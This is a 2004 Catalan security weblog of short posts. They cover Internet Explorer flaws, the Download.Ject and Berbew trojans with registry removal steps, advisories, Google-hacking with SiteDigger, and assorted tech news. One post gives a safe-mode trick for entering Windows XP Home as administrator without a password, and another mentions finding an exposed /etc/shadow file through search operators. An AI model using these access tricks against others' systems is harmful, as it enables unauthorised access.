|
Weblog d'en Xavi Caballé
 |
dimecres, 30 / juny / 2004 |
[The Register] CERT Recommends anything but IE.
A statement on the CERT site said: "There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser, especially when browsing untrusted sites." CERT otherwise recommends users to set security settings to high and disable JavaScript.
|
21:19 (# Enllaç permanent) ()
|
|
|
dimarts, 29 / juny / 2004 |
[News.com] Pop-up program reads keystrokes, steals passwords. Un troià que s'instal·la a través d'una finestra emergent i que captura les dades sensibles utilitzades per a l'accés a determinades institucions financeres.
Whenever an infected PC's user goes to any of nearly 50 financial sites on the Trojan horse's watch list--including Citibank, Barclays and Deutsche Bank--the Trojan horse grabs any account names and passwords,
(...)
Sachs said the Trojan horse was first discovered on the computer of "an employee at a major dot-com." The victim apparently picked up the program from a malicious pop-up ad that used a flaw in Internet Explorer's helper server to install itself on the user's PC.
Per a més detalls, consulteu la informació publicada per l'Internet Storm Center o a Slashdot.
La novetat d'aquest troià radica en el fet d'instal·lar-se com un object d'ajuda (Browser Help Object, BHO) el que permet capturar la informació abans que aquesta estigui xifrada.
Per veure els objectes BHO instal·lats a una màquina podeu utilitzar aquesta eina.
|
22:27 (# Enllaç permanent) ()
|
|
[The Register] publica els resultats de la seva enquesta sobre l'ús del correu electrònic. Algunes de les conclusions:
- El correu electrònic es considera una eina crítica a la majoria d'empreses.
- Microsoft Exchange és el sistema més utilitzat dins de l'entorn empresarial.
- Cada vegada es fan servir mètodes alternatius per a l'accés (connexions sense fil, accés des del domicili particular, accés via GPRS des del telèfon mòbil, accés des de terminals públics...).
- El correu electrònic es fa servir bàsicament per qüestions professionals.
- La tendència dels sistemes de correu és facilitar l'accés remot.
|
07:13 (# Enllaç permanent) ()
|
|
[Security Pipeline] E-Businessess Battle E-Mail Fraud o com els grans noms del comerç electrònic volen treballar per tal que el correu electrònic torni a ser utilitzable. La seva lluita no és contra el correu brossa sinó contra els atacs de suplantació (phishing) on s'intenta enganyar al receptor per tal que reveli les seves dades financeres.
|
07:08 (# Enllaç permanent) ()
|
|
[The Register] Gates defends Microsoft patch efforts. Per Bill Gates, ells ho fan millor que ningú:
"You know, the time - the average time - to fix on an operating system other than Windows is typically ninety to a hundred days," said Gates. "Today we have that down to less than forty-eight hours".
No negaré pas que Microsoft té una de les millors respostes... De fet comparat, per exemple, amb Sun, la seva capacitat de resposta és molt més bona. Ara bé, molts dels problemes que hi ha a Windows són conseqüència de la forma en que el configuren. I canviar això no es fa d'avui per demà.
|
07:00 (# Enllaç permanent) ()
|
|
Redbook d'IBM sobre els conceptes bàsics de LDAP.
The implementation and exploitation of centralized, corporate-wide directories are among the top priority projects in most organizations. The need for a centralized directory emerges as organizations realize the overhead and cost involved in managing the many distributed micro and macro directories introduced in the past decade with decentralized client/server applications and network operating systems.
(...)
This IBM Redbook will help you create a foundation of LDAP skills.
|
00:56 (# Enllaç permanent) ()
|
|
M'imagino que a hores d'ara gairebé tothom que vol ja disposa de compte de correu a Gmail... però si encara queda algú que està fora i vol entrar, digueu-m'ho. Tinc una desena d'invitacions per donar i regalar.
Actualització: Ja no en tinc més...
|
00:12 (# Enllaç permanent) ()
|
|
|
dilluns, 28 / juny / 2004 |
[Microsoft] Deploying PKI Inside Microsoft és una detallada discussió de com Microsoft ha instal·lat una infraestructura de clau pública dins de Microsoft, inicialment amb Windows 2000 i més tard migrada a Windows Server 2003. L'objectiu és oferir comunicacions segures i la infraestructura per a l'autenticació dels usuaris remots.
La PKI de Microsoft s'utilitza per a la signatura i xifrat de missatges amb S/MIME, el xifrat de les comunicacions amb SSL i TLS, l'emmagatzematge segur amb EFS, l'establiment de túnels IPSec i l'autenticació d'usuaris amb targetes intel·ligents.
|
23:59 (# Enllaç permanent) ()
|
|
[TechRepublic] Microsoft lays out server road map. No se pas si això és una bona notícia o no, més aviat ho considero una curiositat... Microsoft ja ha posat data a la publicació del primer Service Pack per a Longhorn, molt abans de que el propi producte estigui disponible.
Algunes dates:
- Longhorn no arribarà fins a l'any 2007
- La primera beta estarà disponible durant la primera part de l'any vinent. la segona beta, cap al 2006.
- El Service Pack per a Longhorn el situen cap a l'any 2008. Pel 2009 pensen en una versió de refresc.
- Per l'any vinent està prevista una versió de refresc de Windows Server 2003, amb noves funcions.
- El segon Service Pack de Windows Server 2003 està previst per l'any 2006.
Si Microsoft continua fidel a les seves tradicions, a aquestes dates cal sumar-hi dos (o fins i tot tres) anys.
|
23:48 (# Enllaç permanent) ()
|
|
[Wired] The Linux killer, sobre la reclamació de SCO sobre la propietat intel·lectual del sistema Unix i la suposada vulneració que representa Linux. Bona lectura per saber el rerefons de l'assumpte.
|
22:03 (# Enllaç permanent) ()
|
|
Quins dos dies més terrorífics que ha fet. Tant ahir com avui s'ha arribat als 34 graus, una autèntica calorada. Ja començo a patir pels ordinadors que tinc a casa...
Aquests dos últims anys he tingut bastants problemes d'hardware durant l'estiu, especialment amb els discos durs. Fa dos anys, un parell de discos van fer llufa (en part per la poca qualitat de la màquina que feia servir de servidor). L'any passat va morir el disc dur del portàtil, però el servidor va aguantar perfectament (un fantàstic Dell OptiPlex GXpro d'origen noruec). De totes formes, últimament la màquina s'ha quedat curta en capacitat de processament i actualment estic preparant el substitut pel servidor; faré servir un portàtil antic, amb la pantalla trencada...
|
21:15 (# Enllaç permanent) ()
|
|
[Vilaweb] 'Ilunga', la paraula més difícil de traduir, segons una web dedicada a traduccions, el rànking de les paraules més complicades de traduir l'ocupa el mot «ilunga» que en l'idioma tshiluba vol dir «una persona capaç de perdonar un abús, tolerar-lo una segona vegada però sota cap circumstància permetre'l una tercera vegada»:
A la llista també s'inclouen les deu paraules en anglès més difícils de traduir:
- plenipotentiary
- gobbledegook
- serendipity
- poppycock
- googly
- Spam
- whimsy
- bumf
- chuffed
- kitsch
La paraula més complicada, en el cas del català és ben fàcil de traduir: plenipotenciari (Persona revestida de plens poders d'un sobirà prop d'una cort estrangera).
Evidentment pels lectors d'aquesta web, els termes googly i spam tampoc han d'oferir massa dificultat.
|
21:01 (# Enllaç permanent) ()
|
|
[TechWorld] Mac OS X Security Myth exposed
Windows is more secure than you think, and Mac OS X is worse than you ever imagined. That is according to statistics published for the first time this week by Danish security firm Secunia.
(...)
One thing the hard figures have shown is that OS X's reputation as a relatively secure operating system is unwarranted, Secunia said. This year and last year Secunia tallied 36 advisories on security issues with the software, many of them allowing attackers to remotely take over the system.
(...)
Mac OS X doesn't stand out as particularly more secure than the competition, according to Secunia. Of the 36 advisories issued in 2003-2004, 61 percent could be exploited across the Internet and 32 percent enabled attackers to take over the system. The proportion of critical bugs was also comparable with other software: 33 percent of the OS X vulnerabilities were "highly" or "extremely" critical by Secunia's reckoning, compared with 30 percent for XP Professional and 27 percent for SLES 8 and just 12 percent for Advanced Server 3. OS X had the highest proportion of "extremely critical" bugs at 19 percent.
|
07:47 (# Enllaç permanent) ()
|
|
Bruce Schneier comenta els plans de Microsoft de limitar la instal·lació del Service Pack 2 de Windows XP únicament a les còpies legítimes, impedint la instal·lació als equips que fan servir una còpia pirata.
SP2 would not run on pirated copies of XP. Those copies would not be upgradeable, and would remain insecure. Only legal copies of the software could be secured.
This is the wrong decision, for all the same reasons that the opposite decision was the correct one.
(...)
This decision, more than anything else Microsoft has said or done in the last few years, proves to me that security is not the first priority of the company. Here was a chance to do the right thing: to put security ahead of profits. Here was a chance to look good in the press, and improve security for all their users worldwide. Microsoft claims that improving security is the most important thing, but their actions prove otherwise.
SP2 is an important security upgrade to Windows XP, and I hope it is widely installed among licensed XP users. I also hope it is quickly pirated, so unlicensed XP users can also install it. In order for me to remain secure on the Internet, I need everyone to become more secure. And the more people who install SP2, the more we all benefit.
|
07:07 (# Enllaç permanent) ()
|
|
Publicat el número 10 de la revista online gratuïta «ISO 17799 News». Aquest número inclou articles sobre com implementar la ISO17799 dins d'una empresa, la conscienciació de seguretat segons l'apartat 4 de la norma 17799, política de seguretat pel correu electrònic, història de l'estàndard...
|
06:57 (# Enllaç permanent) ()
|
|
[News.com] Microsoft confirms supercomputing plans. Microsoft està treballant en una nova versió de Windows, anomenada Windows Server 2003 High Performance Edition, pensada per a ser utilitzada en agrupacions de màquines interconnectades dins d'una xarxa d'alta velocitat per tal d'actuar com una unitat (clusters)
|
06:48 (# Enllaç permanent) ()
|
|
|
diumenge, 27 / juny / 2004 |
stresslinux, una distribució de Linux que funciona directament des del CD (la imatge ISO només ocupa 20 MB) especialment pensada per provar el funcionament dels equips quan estan al màxim!
|
22:49 (# Enllaç permanent) ()
|
|
Avui he estat una bona estona intentant configurar un servidor syslog a Linux... no funcionava, fins que no he trobat la resposta, quan ja gairebé no sabia que mirar.
El syslogd de Linux, a diferència dels altres entorns, en la configuració per defecte no actua com a servidor (no està escoltant el port 514/udp). La pàgina man ho diu clarament:
| -r |
This option will enable the facility to receive message from the network using an internet domain socket with the syslog service (see services(5)). The default is to not receive any messages from the network.
This option is introduced in version 1.3 of the sysklogd package. Please note that the default behavior is the opposite of how older versions behave, so you might have to turn this on.
| En el cas de Fedora Linux, cal editar el fitxer /etc/sysconfig/syslog i a SYSLOGD_OPTIONS cal afegir l'opció -r: SYSLOGD_OPTIONS="-r -m 0"
|
22:19 (# Enllaç permanent) ()
|
|
Trucs de tota mena per Linux... la configuració de ntp, el funcionament de cpio, tar xifrat, creació d'un sistema de fitxers virtual, compartició de directoris, esborrar fitxers de forma segura, configuració de l'.htaccess, realització de còpies de seguretat.. un total de 66. Imprescindible!
|
21:00 (# Enllaç permanent) ()
|
|
[Information Security Magazine] Exposed tracta sobre els problemes dels programes antivirus i com aquests no ofereixen una protecció completa.
We found that many AV solutions are surprisingly easy to defeat, can't detect malware using alternative attack vectors and are difficult to manage. Strikingly, the capabilities and reliability of the products varied greatly.
In the two decades since the first viruses appeared, most AV vendors continue to push the same basic signature-based technology. Feature sets have been added and functionality improved, but the products haven't evolved as rapidly as the capabilities of viruses and worms.
For this reason, rather than simply testing the breadth and effectiveness of vendors' signature libraries, we focused on other critical--and often neglected--aspects of AV products: effectiveness against attack mechanisms designed to fool or disable AV protection; detection of increasingly popular forms of malware such as spyware and backdoors; and, in particular, enterprise-scale manageability.
|
00:12 (# Enllaç permanent) ()
|
|
|
dissabte, 26 / juny / 2004 |
[Infoworld] Windows Server 2003 vanishes from vulnerability list
Lately, though, I've noticed that one version doesn't show up: Microsoft Windows Server 2003 is notable in its absence. Because I tend to save the Deep Sight reports (at least for a while) I went back and did some checking. I was startled to discover that Windows Server 2003 is almost never on this list. Has Microsoft finally turned the corner on security?
So I called up Microsoft to ask the question; their public relations agency eventually tracked down Michael Howard, senior program manager of Microsoft's security business and technology unit. I asked him if the company has finally managed to get security right.
"Yeah," said Howard.
Fortunately, he elaborated, helping to keep this from being a really short column. "The only way over time to reduce vulnerability," Howard explained, "is to admit you have a problem."
|
23:36 (# Enllaç permanent) ()
|
|
[SecurityFocus] Wi-fi hopper guilty of cyber-extortion explica com el FBI va detenir a un criminal de coll blanc que realitzava extorsions utilitzant les connexions sense fils com un sistema per cobrir la seva identitat
Maryland man with a grudge against a Connecticut-based patent firm used unsecured wireless networks at homes and businesses in the Washington D.C. area to penetrate the company's computers and deliver untraceable threats and extortion demands, until an FBI surveillance team caught him in the act.
(...)
Though he went to some lengths to make himself untraceable technically, past altercations between Tereshchuk and the company made him the prime suspect from the start, according to court records. The clearest sign came when he issued the seventeen million dollar extortion demand, and instructed the company to "make the check payable to Myron Tereshchuk".
The FBI began following Tereshchuk, and in March a surveillance team watched as he drove to a computer lab at the University of Maryland, where he used a purloined student account to send more threatening e-mail. "During this drive he was observed driving erratically and was paying a lot of attention to something in the front passenger side seat," an FBI affidavit notes. Bé... que es pot esperar d'una persona que, realitzant una extorsió, demana els diners en un xec al seu nom? L'extorsionador podia tenir coneixements tècnics... però, demanar el xec al seu nom?
|
23:22 (# Enllaç permanent) ()
|
|
[IT Manager's Journal] How to use cryptography in computer security
While a Ph.D. in cryptography is hardly a requirement for keeping one's systems secure, an understanding of the basics helps in decision making about security, both for system administrators and IT managers. In this article, I present a non-technical overview of a few key concepts in cryptography that are relevant to consumers of security solutions. I then look at some widespread myths about cryptography, and give some advice on practical matters relating to cryptography.
|
23:06 (# Enllaç permanent) ()
|
|
Ja sé que molta gent es riurà... però per primera vegada he superat la barrera d'un milió de hits mensuals. No està malment si tinc en compte que ara fa un any no arribava als tres cent mil hits mensuals i fa dos anys ni als cent mil. 
L'ADSL està que treu fum...
|
19:13 (# Enllaç permanent) ()
|
|
[News.com] Wi-Fi security standard sealed and delivered. La IEEE ha aprovat l'especificació 802.11i, amb la intenció de millorar la qualitat de la seguretat a les connexions sense fil. 802.11i fa servir AES (Advanced Encryption Standard) per al xifrat de les comunicacions, amb claus de 128, 192 i 256 bits.
|
12:42 (# Enllaç permanent) ()
|
|
[The Register] Watch out! Incoming mass hack attack, sobre els efectes que pot tenir l'atac contra servidors web (Microsoft IIS 5.0) per tal d'infectar automàticament als usuaris.
This is what everyone has been really frightened about for a while now," said Conor Flynn, technical director with Rits Information Security in Dublin. The fear is rooted in the fact that there is no patch from Microsoft for the flaws, nor is there any indication that a patch is on the verge of being released. Though the virus-like infection rate remains low, experts like Flynn say the matter could become a more serious problem unless a fix is released soon. "There is no question that this one could be devastating," he said.
|
12:38 (# Enllaç permanent) ()
|
|
Berbew/Webber/Padodor Trojan Analysis, detallat estudi del troià que s'instal·la automàticament amb l'Internet Explorer al visitar un servidor web IIS 5.0 infectat. Captura les contrasenyes utilitzades per accedir a determinats llocs web.
També inclou indicacions de com esborrar-lo:
Search the registry for the key
HKLM\Software\Microsoft\Windows\
CurrentVersion\
ShellServiceObjectDelayLoad
and remove the entry:
"Web Event Logger" = "{79FB9088-19CE-715E-D900-216290C5B738}"
Also remove in
HKCR\CLSID\{79FB9088-19CE-715E-D900-216290C5B738}\
InProcServer32:
"(Default)" = "%sysdir%/xxxxxx32.dll"
"ThreadingModel" = "Apartment"
where xxxxxx is a random string of lowercase characters. Reboot the machine and remove the dll file from the system directory. The trojan exe file also has a random name, but can be spotted by looking for files with the same timestamp as the dll. Remove surf.dat from the system directory - this file contains captured logins and passwords.
|
10:10 (# Enllaç permanent) ()
|
|
Una vulnerabilitat crítica de l'Internet Explorer publicada fa més de dues setmanes, i per a la qual Microsoft encara no ha subministrat solució, està provocant que gran quantitat d'usuaris s'infectin per un troià de forma automàtica al visitar determinats servidors web compromesos. Nou i dura garrotada a la credibilitat de Microsoft en relació a la seguretat, que posa en evidència la seva política de distribuir macropegats de forma mensual.
Continuació... -
Recomanacions per a detectar servidors afectats i per prevenir la infecció del troià.
|
01:30 (# Enllaç permanent) ()
|
|
|
divendres, 25 / juny / 2004 |
Per saber si el codi malèvol que s'instal·la automàticament a través de l'Internet Explorer quan es visita un servidor web afectat pel cuc està present a la nostra màquina, cal cercar la presència d'aquests fitxers:
Si hi són, vol dir que la nostra màquina està infectada.
|
21:51 (# Enllaç permanent) ()
|
|
Microsoft ha publicat un butlletí sobre Download.Ject, que és el cuc que atacant els servidors web Microsoft Internet Information Server 5.0.
Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code.
|
21:45 (# Enllaç permanent) ()
|
|
 [Treocentral] 4th Gen Treo: "Ace"? A Treocentral parlen de les primeres pistes de com pot ser el Treo de quarta generació, que segurament no el veurem fins a finals d'any (ells parlen de la tardor) o més probablement l'any vinent... de moment no es res més que un simple rumor, però promet. Entre d'altres novetats destaca la pantalla a 320x320 (sensacional!), Bluetooth, càmera de 1,3 Mpixels, processador més ràpid, més memòria, possibilitat de fer servir targetes WiFi...
|
21:09 (# Enllaç permanent) ()
|
|
[Infoworld] MS issues warning on Web attacks, pushes XP2 SP2 beta
Microsoft Corp. acknowledged Thursday that Internet Information Server (IIS), a component of the Windows 2000 Server, and holes in the Internet Explorer Web browser are being used in widespread attacks that are compromising Web pages and using them as launching pads for malicious computer code.
Microsoft issued an alert late Thursday and posted a Web page with information on the attacks. The company urged customers to apply the latest security patches for both IIS and the Internet Explorer Web browser and increase the security settings on Internet Explorer browser. In an unusual move, Microsoft noted that users that are running its as-yet-unreleased Windows XP Service Pack 2 operating system are protected. (See: www.microsoft.com/security/.)
|
19:28 (# Enllaç permanent) ()
|
|
Ahir incidents.org (veure això i aìxò) va recollir el que sembla ser un nou atac massiu contra els servidors web basats en l'Internet Information Server. L'objectiu sembla convertir aquestes màquines en sistemes per a la distribució de correu brossa així com la instal·lació de troians a les màquines dels usuaris que visiten els servidors infectats:
A large number of web sites, some of them quite popular, were compromised earlier this week to distribute malicious code. The attacker uploaded a small file with javascript to infected web sites, and altered the web server configuration to append the script to all files served by the web server. The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.
If a user visited an infected site, the javascript delivered by the site would instruct the user's browser to download an executable from a Russian web site and install it. Different executables were observed. These trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system.
The javascript uses a so far unpatched vulnerability in MSIE to download and execute the code. No warning will be displayed. The user does not have to click on any links. Just visiting an infected site will trigger the exploit.
If your SERVER was compromised, you will observe:
- All files sent by the web server will include the javascript. As the javascript is delivered by the web server as a global footer, images and other documents (robots.txt, word files) will include the javascript as well.
- The files on your server will not be altered. The javascript is included as a global footer and appended by the server as they are delivered to the browser.
- You will find that the global footer is set to a new file.
- For snort signatures, see http://www.bleedingsnort.com.
|
19:06 (# Enllaç permanent) ()
|
|
[ZDNet] New security spec could shore up Wi-Fi
The Institute of Electrical and Electronic Engineers standards board will decide Thursday whether the current version of the 802.11i specification is reliable enough to become an industry standard. The current draft has already been through a review committee, said Brian Matthews, publicity chairman of the IEEE 802.11 working group and vice president of AbsoluteValue Systems.
Wi-Fi products establish wireless local area networks that allow devices to connect to one another, transmitting and receiving data within a range of 150 feet. The final 802.11i specification ensures that the data sent along those networks is encrypted and can't be broken by anyone who may intercept it.
|
07:25 (# Enllaç permanent) ()
|
|
|
dijous, 24 / juny / 2004 |
[Via Slashdot] la BBC entrevista a l'inventor del DNS i que en pensa sobre el futur proper de la xarxa
«Ten years from now, we will look back at the net and think how could we have been so primitive».
All communication will be over the net, he predicts, and we will no longer need phone numbers, just web addresses.
«Ten years from now, we will wonder how it was so hard to find things on the network too», he told BBC News Online.
«At best we are at the Bronze Age, we are not even at the Iron Age stage in the network».
(...)
«It was fun to be in on the Stone Age. But what comes next is even better».
|
23:31 (# Enllaç permanent) ()
|
|
[Network Fusion] Switches taking on new security roles
Security innovations being built into switches are attracting attention from buyers who not long ago focused primarily on feeds and speeds.
Network executives say they need all the help they can get to cope with today's threats. They are eager to use new switch-based security schemes - such as the ability to quarantine viruses and enforce policies - being touted by Alcatel, Cisco and Enterasys Networks, among others.
Algunes de les novetats que veurem en els propers mesos:
- Alcatel: Capacitat per aillar màquines, treballant conjuntament amb els sistemes de detecció d'intrusions.
- Cisco: defensa contra cucs i atacs distribuïts de denegació de servei.
- Enterasys: integracíó dels commutadors dins de la política dels IDS.
|
23:05 (# Enllaç permanent) ()
|
|
FoundStone publica una eina gratuïta que permet cercar dins de Google la informació sensible divulgada d'una forma accidental. Ens trobem davant una nova eina imprescindible en la caixa d'eines dels professionals de seguretat.
Continuació... - També a Hispasec.com.
|
21:11 (# Enllaç permanent) ()
|
|
Beyond Megapixels, sèrie de tres articles sobre tot el que cal conèixer de les màquines fotogràfiques digitals.
Evidentment són consideracions per gent que veu la fotografia com un art... jo personlament em perdo amb tanta història i em quedo amb una simple màquina Point and Shoot i... que vols que et digui, les fotografies queden prou bé! :-)
|
20:35 (# Enllaç permanent) ()
|
|
[Jon Udell] Fa uns pocs dies vaig escriure un curt article sobre la utilització de gestors de contrasenyes. A OS X Keychain and Win XP Credential Manager Jon Udell tracta d'una qüestió semblant. Segons indica, el Mac OS X incorpora un gestor de contrasenyes... i teòricament el Windows XP Professional incorpora també un, l'anomenat Credential Manager (tal co es pot veure a la llista de prestacions que hi ha a la web de Microsoft). Ara bé, a efectes pràctics aquesta funció no està realment implementada.
|
19:36 (# Enllaç permanent) ()
|
|
[BSD at Work] Mac address spoofing on FreeBSD using netgraph
This article explains how to spoof a MAC address using FreeBSD. This is commonly known as "MAC cloning", and is offered as a feature on some commercial routers and wireless access points.
The Netgraph system, an in-kernel networking subsystem built into FreeBSD, provides all the required tools to properly spoof MAC addresses. The attached code will work on a FreeBSD 5.2.1-RELEASE system "out of the box" and has only been successfully tested with FreeBSD 5.2.1-RELEASE.
|
19:32 (# Enllaç permanent) ()
|
|
Un noi de vint anys compra la llista de clients d'American Online (92 milions) per tal d'enviar spam... quins temps!
An AOL software engineer was arrested today for stealing the company's entire subscriber list--totaling 92 million screen names--and selling it to a 21-year-old Las Vegas spammer.
|
19:28 (# Enllaç permanent) ()
|
|
 Fa un temps em vaig adonar que utilitzant algunes de les funcions de cerca avançada de Google, com ara inurl: i intitle: es podien fer descobriments força interessants. En aquella ocasió vaig trobar-me amb un fitxer de contrasenyes d'una màquina Unix (/etc/shadow que, per cert, encara continua visible).
Avui, via el weblog de Juanma, he descobert l'existència de l'eina SiteDigger de FoundStone. Es tracta d'una utilitat gratuïta que permet automatitzar aquesta mena de consultes a Google, utilitzant l'API que ofereix aquest cercador.
Amb aquesta utilitat podem cercar a la memòria cau de Google la presència de fitxers que en algun moment han estat visibles i que poden comprometre la seguretat del sistema. Entre molts altres, cerca la presència de fitxers històrics de bash i sh, fitxers de contrasenyes com .htpasswd, pàgines d'administració, documents Excel amb contrasenyes, pàgines per defecte de servidors web, missatges d'error (alguns dels quals mostren la contrasenya que s'ha utilitzat), errors de consultes SQL, expressions mal construïdes, documents que poden revelar dades sensibles (registre d'activitat, dades financeres, estadístiques d'ús), pàgines d'administració remota, vulnerabilitats conegudes, etc...
Tot això converteix aquesta eina en una valuosa eina d'avaluació de l'exposició de dades que afecten a la seguretat i que està disponible en pàgines públiques (Google).
SiteDigger funciona en entorn Windows, amb les extensions .NET i requereix disposar d'una llicència per accés a l'API de Google (que es pot obtenir de forma gratuïta).
Per a més detalls, podeu consultar el white paper publicat per FoundStone on s'explica abastament el funcionament d'aquesta eina i la mena d'informació que està disponible.
|
16:05 (# Enllaç permanent) ()
|
|
[Aaron Margosis] «RunAs» basic (and intermediate) topics. A l'entorn Windows de vegades és molt difícil un ús habitual de l'ordinador sense els privilegis d'administrador. De fet, moltes tasques són impossibles de realitzar per part d'usuari normal ja que calen privilegis administratius.
En l'article al que faig referència es mostra com la utilització de l'ordre RunAs pot facilitar les tasques de suport dels usuaris sense privilegis, ja que permet executar ordres amb unes credencials d'usuari diferents.
|
14:13 (# Enllaç permanent) ()
|
|
[Infosec Writers] Securing your Windows laptop explica els problemes de seguretat habitualment associats als ordinadors portàtils que fan servir Windows i com aplicar les mesures de seguretat disponibles.
|
11:44 (# Enllaç permanent) ()
|
|
 Darik's Boot and Nuke (DBAN) és un disquet d'inici que, d'una forma segura, esborra tot el contingut del disc dur, de forma que no puguin ser recuperats. S'ajusta als estàndards nord-americans i canadencs per a la destrucció d'informació i dóna suport a virtualment qualsevol tipus de disc dur.
|
11:08 (# Enllaç permanent) ()
|
|
|
dimecres, 23 / juny / 2004 |
pssh és un client, lliure i gratuït, de Secure Shell per a dispositius PalmOS 5. L'he provat amb el Treo i funciona molt bé... ràpid i funcional. L'únic problema que he trobat és la poca amplada de la pantalla ja que només permet treballar en modalitat de 40 o 26 columnes, depenent de la font utilitzada:
L'important d'aquest client és que funciona amb la connexió GPRS del Treo, de forma que es pot utilitzar des de virtualment arreu. És per tant interessant com a eina d'accés d'emergència... no pas per connectar-hi cada dia.
Com es pot veure (o intuir) a les captures de pantalla, s'elimina un dels problemes del teclat del Treo (l'absència de la tecla Escape) amb un botó.
|
20:55 (# Enllaç permanent) ()
|
|
Wasabi és una utilitat per a la monitorització dels fitxers de registre d'activitat, comparant-lo amb una sèrie d'expressions regulars definides, informant de qualsevol aparició d'un text que coincideix amb les mateixes. Wasabi requereix la presència del GNU tail i el mòdul PERL Net::SMTP per tal d'enviar els informes per correu electrònic.
|
17:23 (# Enllaç permanent) ()
|
|
Avís del CERT: dues vulnerabilitats al servidor DHCP (versions 3.0.1rc12 i 3.0.1rc13) de l'ISC. La primera pot ser utilitzada per un atacant remot per provocar un atac de denegació de servei. La segona, a més del DoS és possible que pugui arribar a ser possible l'execució de codi a les màquines vulnerables. La solució passa per actaulitzar a la versió 3.0.1rc14.
La vulnerabilitat que permet l'execució de codi de forma remota afecta a les versions vulnerables de DHCP executant-se a AIX, AlphaOS, CygWin32, HP-UX, Irix, Linux, NextStep, SCO, SunOS 4 i 5.5 i Ultrix.
|
15:47 (# Enllaç permanent) ()
|
|
iptables-p2p és un mòdul per a iptables que permet la detecció (i bloqueig) dels programes p2p:
- Fastrack (KaZaa, Grokster...)
- eDonkey (eDonkey, eMule...)
- Direct Connect
- Gnutella
- BitTorrent
- OpenFT (giFT)
|
07:37 (# Enllaç permanent) ()
|
|
|
dimarts, 22 / juny / 2004 |
CheckPatches i GetApplyPatches, un parell d'scripts per Solaris que permeten, el primer determinar quins pegats publicats per Sun no estan instal·lats a una màquina. La segona automatitza el procés de baixar-se i instal·lar un pegat.
Com això és un món Unix, un valent pot fer això:CheckPatches | sort -u | GetApplyPatch
per instal·lar automàticament els pegats disponibles i no presents a la màquina... Fins i tot es pot executar directament com un treball cron... ;-)
|
20:58 (# Enllaç permanent) ()
|
|
Umbrella.name, una web amb molta informació sobre seguretat de diversos productes de Microsoft: Internet Explorer, Outlook, Java Virtual Machine i Windows Media Player.
|
20:49 (# Enllaç permanent) ()
|
|
Què fàcil és recuperar-la...
Cal reiniciar la màquina, prémer la tecla F8 per entrar en la menú d'arrencada. A continuació escollim l'opció "Modalitat segura"... d'aquesta forma entrem com administrador sense que calgui entrar la contrasenya. Un cop dins, podem canviar la contrasenya sense cap problema.
Actualització: Tal com indica l'Oriol als comentaris, això només funciona amb XP Home.
|
07:42 (# Enllaç permanent) ()
|
|
[Via Slashdot], un article de BusinessWeek: Your Lapel Is Ringing o com els telèfons mòbils s'integren dins del complement del vestit (rellotges, polseres, la solapa de les jaquetes...).
No estic convençut que això arribi a tenir massa èxit, com a mínim a curt termini... veig més la integració dels telèfons amb els ordinadors (o més aviat al revés, que els ordinadors acabin esdevenint telèfons... la potència d'un portàtil actual en la mida d'un petit telèfon mòbil) que no pas en portar-lo integrat a la roba.
De totes formes, no deixa de ser curiós veure el recull de fotos.
|
07:36 (# Enllaç permanent) ()
|
|
El projecte Uptime recull informació dels sisteme que participen (i que han instal·lat un programa client), generant estadístiques dels sistemes que estan més estona en funcionant (per sistema operatiu, per nombre de reinicis, per nombre d'usuaris...).
|
07:30 (# Enllaç permanent) ()
|
|
|
dilluns, 21 / juny / 2004 |
Plane Lands at Air Force Base by Mistake... i el capità demanant als passatges que tanquin les finestres i no mirin afora, no sigui cas que els llencin un míssil.
A Northwest Airlines flight that was headed to Rapid City, S.D., landed a few miles off course at Ellsworth Air Force Base, and passengers had to wait in the plane for more than three hours while their crew was interrogated.
|
15:53 (# Enllaç permanent) ()
|
|
Benvingut estiu... espero que enguany no siguis tan implacable com l'any passat.
|
07:28 (# Enllaç permanent) ()
|
|
Un dels principals problemes amb els quals es troba avui en dia un administrador de sistemes és el gran nombre de contrasenyes que està a recordar. Els gestors de contrasenyes ofereixen un sistema segur per al seu emmagatzematge.
Continuació... - També a Hispasec.com
|
00:50 (# Enllaç permanent) ()
|
|
[Dan Gillmor] How do we adjust when cameras are everywhere?
Sprint has announced that it will start selling camera-less Treo 600 smart phones from PalmOne, the Milpitas maker of the popular handheld devices. Why? To satisfy customers fearful of corporate espionage inside their businesses.
(...)
Sprint's move highlights one more set of issues we have to confront in a world of digital information. Whether we're talking about photos or videos or documents or just about anything else that can be converted into zeroes and ones, we're entering a changed world.
(...)
For individuals, the issue is fairly simple, I think. We need to strictly enforce laws that prohibit uninvited snooping, whether by governments, businesses or nosy neighbors. A zone of privacy is essential, or we'll lose a fundamental part of what it means to live in a free society.
|
00:12 (# Enllaç permanent) ()
|
|
|
diumenge, 20 / juny / 2004 |
 Avui al Telenotícies Vespre han donat una notícia (*) sobre un «Observatorio Español de Internet» reclamant l'existència d'una polícia global a Internet... Encara m'estic rient de les tonteries que han dit, en especial en la breu entrevista al portaveu d'auqest observatori.
(*) La versió online de la notícia és molt més light i no inclou les declaracions del pallasso que fa de portaveu.
|
23:16 (# Enllaç permanent) ()
|
|
 Pràcticament tres mesos després, avui he adquirit el quart número de la revista «Hakin9», especialitzada en seguretat. Correspon als mesos de maig i juny. Curiosament a la web de la revista aquest número encara surt anunciat com «el proper...».
Els articles d'aquest número són:
- Man in the middle - ataque a sesiones encriptadas
- ¿cómo se envía un spam?
- Escribimos el shellcode para los sistemas MS Windows
- CerbNG - una nueva mirada a la seguridad del sistema FreeBSD
- Protección contra el spam en el servidor
- Comparación de los filtros bayesianos para servidores
- Herramientas: brup proxy, sock
|
21:11 (# Enllaç permanent) ()
|
|
[Vilaweb] Mal temps per als ciberdelictes
El proper 1 d’octubre entra en vigor la modificació del codi penal pel que fa a delictes d’internet o relacionats amb les noves tecnologies. Així doncs, serà delicte desbloquejar telèfons mòbils, la possessió de qualsevol eina informàtica que pugui trencar la protecció de programes, DVD o CDs, piratejar senyals de televisió i fins i tot compartir l’accés a internet amb els veïns sense el permís explícit de l’operadora que presta el servei. L’advocat Carlos Sánchez Almeida ha analitzat el nou codi penal en un article a Noticiasdot, on afirma que la nova legislació posa en perill els drets i les llibertats conquerides pels ciutadans després de quaranta anys de dictadura.
